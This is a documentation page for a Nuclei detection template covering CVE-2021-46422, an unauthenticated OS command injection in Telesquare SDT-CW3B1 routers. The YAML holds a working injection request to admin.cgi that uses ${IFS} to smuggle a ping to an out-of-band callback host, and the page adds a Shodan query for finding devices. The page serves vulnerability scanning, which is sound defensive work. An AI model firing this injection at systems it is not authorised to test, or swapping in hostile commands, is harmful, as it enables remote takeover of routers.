Skip to content
Nuclei Templates

SDT-CW3B1 1.1.0 - OS Command Injection

ID: CVE-2021-46422

Severity: critical

Author: badboycxcc,prajiteshsingh

Tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb

Description

Section titled “Description”

Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.

YAML Source

Section titled “YAML Source”
id: CVE-2021-46422


info:
  name: SDT-CW3B1 1.1.0 - OS Command Injection
  author: badboycxcc,prajiteshsingh
  severity: critical
  description: |
    Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: |
    Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50936
    - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46422
    - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
    - http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-46422
    cwe-id: CWE-78
    epss-score: 0.95843
    epss-percentile: 0.99441
    cpe: cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: telesquare
    product: sdt-cs3b1
    shodan-query: html:"SDT-CW3B1"
  tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb
variables:
  cmd: "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}"


http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<CmdResult>"


      - type: word
        name: http
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100c6db3571fab76555c028db718c0ec1ce3f07fc371cdf4beadef73b89b1ee42a5022100e0dcd1c7bbed84a19e9d4209e6229b354bf113130449bf5dad5af70759a2ad6e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46422.yaml"

View on Github